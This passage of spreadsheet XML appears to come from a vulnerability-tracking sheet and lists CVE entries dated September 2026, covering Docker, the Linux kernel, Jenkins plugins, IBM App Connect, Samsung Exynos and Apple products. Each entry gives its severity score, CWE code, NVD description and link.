      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85469</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr">
        <is>
          <t>CWE-1357</t>
        </is>
      </c>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in quay-builder-qemu. A remote attacker could exploit this by compromising the upstream `Noelware/docker-manifest-action` used in the release workflow, which is pinned to a mutable branch. This allows the attacker to inject arbitrary code, leading to the exfiltration of sensitive registry credentials or the publication of malicious images. The workflow also exposes the default GitHub token, increasing the severity of the compromise.</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85469</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89947</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: meson: align gxbb_32k_clk_sel number of parents with actual count
The following out-of-bounds read has been observed by Christian on a
GXBB WeTek Hub:
==================================================================
BUG: KASAN: global-out-of-bounds in __clk_register+0x1b70/0x2418
Read of size 8 at addr ffffd66320cf88e0 by task swapper/0/1
CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 7.0.0-rc5 #1 PREEMPT
Hardware name: WeTek Hub (DT)
Call trace:
 show_stack+0x14/0x20 (C)
 dump_stack_lvl+0x74/0x94
 print_report+0x164/0x4b0
 kasan_report+0x98/0xd8
 __asan_report_load8_noabort+0x1c/0x24
 __clk_register+0x1b70/0x2418
 devm_clk_hw_register+0x74/0x15c
 meson_clkc_init+0xd4/0x20c
 meson_clkc_syscon_probe+0x5c/0x94
 platform_probe+0xbc/0x17c
 really_probe+0x184/0x844
 __driver_probe_device+0x154/0x35c
 driver_probe_device+0x60/0x188
 __driver_attach+0x168/0x4a0
 bus_for_each_dev+0xec/0x180
 driver_attach+0x38/0x58
 bus_add_driver+0x238/0x4c0
 driver_register+0x150/0x388
 __platform_driver_register+0x54/0x7c
 gxbb_clkc_driver_init+0x18/0x20
 do_one_initcall+0xb8/0x340
 kernel_init_freeable+0x49c/0x52c
 kernel_init+0x24/0x148
 ret_from_fork+0x10/0x20
The buggy address belongs to the variable:
 gxbb_32k_clk_parents+0x60/0x400
The buggy address belongs to a vmalloc virtual mapping
The buggy address belongs to the physical page:
Memory state around the buggy address:
 ffffd66320cf8780: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
 ffffd66320cf8800: 00 04 f9 f9 f9 f9 f9 f9 00 04 f9 f9 f9 f9 f9 f9
&gt;ffffd66320cf8880: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
                                                       ^
 ffffd66320cf8900: 00 01 f9 f9 f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9
 ffffd66320cf8980: 00 00 02 f9 f9 f9 f9 f9 00 00 02 f9 f9 f9 f9 f9
==================================================================
Commit 7915d7d5407c ("clk: amlogic: gxbb: drop non existing 32k clock
parent") dropped a non-existing clock parent from the gxbb_32k_clk_sel
mux but didn't adjust the hard-coded num_parents field. Fix the actual
number of parents of that mux by using ARRAY_SIZE instead (avoiding
similar problems in future).</t>
        </is>
      </c>
      <c r="S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89947</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89954</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="inlineStr"/>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: afs: validate v2 image info bounds
The AFS v2 parser uses footer[8] to locate the image information block
inside the current erase block, then uses the image information
region_count to walk entries from a fixed local array. The footer offset
and region count come from flash contents and are not checked against the
erase block or the local image-info array before use.
Reject v2 entries whose image information offset would underflow the
erase block calculation, and reject region counts that cannot fit in the
local image-info array before walking region entries.</t>
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89954</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92127</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier automatically approves the classpath entries in an item configuration when a user with Overall/Administer permission copies the item, or updates that configuration through the REST API or CLI, allowing attackers able to define classpath entries to execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92127</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92134</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>Jenkins Warnings Plugin 13.10258.va_17d49a_78c3b_ and earlier does not validate the analysis results ID when a job configuration is submitted through the REST API, allowing attackers with Item/Configure permission to use a javascript: scheme URL as identifier, resulting in a stored cross-site scripting (XSS) vulnerability.</t>
        </is>
      </c>
      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92134</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92135</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>Jenkins Coverage Plugin 3.3358.v9487dde48783 and earlier does not validate the coverage results ID when a job configuration is submitted through the REST API, allowing attackers with Item/Configure permission to use a javascript: scheme URL as identifier, resulting in a stored cross-site scripting (XSS) vulnerability.</t>
        </is>
      </c>
      <c r="S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92135</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92136</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>Jenkins OWASP Dependency-Check Plugin 5.6.4 and earlier does not escape CWE values from Dependency-Check reports on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.</t>
        </is>
      </c>
      <c r="S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92136</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89911</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Correctly cap TLBI Range to the architural limit
TLB Invalidation by Range has a fairly powerful way of encoding pretty
large ranges in a small number of bits. This range can be based on an
arbitrary VA, which means it is pretty easy for a guest to generate an
overflow should the hypervisor be naive enough to add the range to the
base...
Make sure the range is capped to the limit dictated by the address bit
that determines the VA range. For an IPA invalidation, this is further
corrected down the line to ignore the upper range.</t>
        </is>
      </c>
      <c r="S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89911</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17133</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.0, and 12.0.1.0 through 12.0.12.27 could allow a local attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17133</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17156</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.0, and 12.0.1.0 through 12.0.12.27 could allow a local attacker to execute arbitrary code due to insecure deserialization.</t>
        </is>
      </c>
      <c r="S431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17156</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17416</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.0, and 12.0.1.0 through 12.0.12.27 could allow a local attacker to execute arbitrary code due to insecure deserialization.</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17416</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23789</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in MFC in Samsung Mobile Processor and Wearable Processor Exynos 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 2600, 1680, W920, W930, and W1000. A double-free vulnerability in the Exynos MFC encoder driver (due to improper cleanup of dma_buf references during error handling) leads to kernel memory corruption and potential arbitrary code execution.</t>
        </is>
      </c>
      <c r="S433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23789</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43684</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, macOS Golden Gate 27, macOS Sequoia 15.8. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43684</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43688</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27. Processing a maliciously crafted file may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43688</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43702</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in iOS 26.6 and iPadOS 26.6, iOS 26.7 and iPadOS 26.7, macOS Sequoia 15.8, macOS Tahoe 26.6, macOS Tahoe 26.7, tvOS 26.6, watchOS 26.6. Processing a maliciously crafted video file may lead to unexpected app termination or corrupt process memory.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43702</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59974</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R437" s="5" t="inlineStr">
